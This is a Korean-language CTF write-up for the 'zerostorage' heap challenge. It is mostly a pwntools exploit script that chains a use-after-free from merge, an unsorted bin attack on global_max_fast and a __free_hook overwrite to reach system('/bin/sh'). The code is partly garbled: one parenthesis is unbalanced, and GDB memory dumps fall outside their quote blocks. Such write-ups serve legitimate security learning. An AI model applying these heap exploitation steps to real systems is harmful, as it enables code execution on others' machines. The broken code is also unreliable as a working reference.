ZeroStorage

merge에서 취약점 발생 같은것을 합칠수 있음(uaf)

unsorted bin attack으로 global_max_fast를 덮는다(global_max_fast의 값보다 작은 힙들은 모두 fast bin 처럼 사용 가능)

free_hook을 덮고 exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
from pwn import *
 
def insert(length,data):
        sla(':','1')
        sla(':',str(length))
        sa(':',data)
 
def update(idx,length,data):
        sla(':','2')
        sa(':',data)
 
def merge(idx1,idx2):
        sla(':','3')
        sla(':',str(idx1))
        sla(':',str(idx2))
 
def delete(idx):
        sla(':','4')
        sla(':',str(idx))
 
def view(idx):
        sla(':','5')
        sla(':',str(idx))
 
def list():
        sla(':','6')
 
r=process('./zerostorage')
e=ELF('./zerostorage')
libc=e.libc
 
sla = lambda x,y : r.sendlineafter(x,y)
sa = lambda x,y : r.sendafter(x,y)
ru = lambda x : r.recvuntil(x)
 
insert(0x40,'A'*0x40)#0
insert(0xf8,'B'*0xf8)#1
 
merge(0,0)#2
 
view(2)
 
ru('Entry No.2:\n')
libc_leak = u64(ru('\x7f')+'\x00\x00'- 0x3c4b78
log.info(hex(libc_leak))
 
#global_max_fast edit
global_max_fast = libc_leak + 0x3c67f8
log.info('Global_max_fast : '+hex(global_max_fast))
 
update(2,0x20,p64(0xdeadbeef)+p64(global_max_fast-0x10)+'A'*0x10)
insert(0x10,'/bin/sh\x00'+'\x00'*0x8)#0
 
'''
0x7faab01147e8 <free_list>:     0x00000000      0x00000000      0x00000000      0x00000000
insert(0x10,'/bin/sh\x00'+'\x00'*0x8)#0
'''
0x7faab01147e8 <free_list>:     0x00000000      0x00000000      0x00000000      0x00000000
0x7faab01147f8 <global_max_fast>:       0xb0112b78      0x00007faa      0x00000000      0x00000000
0x7faab0114808 <root>:  0x00000000      0x00000000      0x00000000      0x00000000
0x7faab0114818 <old_realloc_hook>:      0x00000000      0x00000000      0x00000000      0x00000000
0x7faab0114828 <old_malloc_hook>:       0x00000000      0x00000000      0x00000000      0x00000000
0x7faab0114838 <added_atexit_handler.9387>:     0x00000000      0x00000000      0x00000000      0x00000000
'''
#update(2,0x20,p64(libc_leak+0x3c4b78)*2+'A'*0x10)
merge(1,1)#3
free_hook = libc_leak + libc.symbols['__free_hook']
oneshot = libc_leak + libc.symbols['system']
log.info(hex(free_hook))
log.info(hex(oneshot))
'''
0x7fb2faf3574f0x00000000      0x00000000      0x00000200      0x00000000
0x7fb2faf3575f0x00000000      0x00000000      0x00000000      0x00000000
0x7fb2faf3576f <list_all_lock+15>:      0x00000000      0x00000000      0x00000000      0x00000000
0x7fb2faf3577f <_IO_stdfile_2_lock+15>0x00000000      0x00000000      0x00000000      0x00000000
0x7fb2faf3578f <_IO_stdfile_1_lock+15>0x00000000      0x00000000      0x00000000      0x00000000
0x7fb2faf3579f <_IO_stdfile_0_lock+15>0x00000000      0x00000000      0x00000000      0x00000000
0x7fb2faf357af <__free_hook+7>0x00000000      0x00000000      0x00000000      0x00000000
'''
update(3,0x1f8,p64(free_hook-0x59)+p64(0xdeadbeef)+'A'*(0x1f8-0x10))
insert(0x1f8,p64(free_hook-0x59)+'\x00'*(0x1f8-0x8))
insert(0x1f8,'\x00'*0x49+p64(oneshot)+'\x00'*(0x1f8-(0x49+8)))
delete(0)
r.interactive()
cs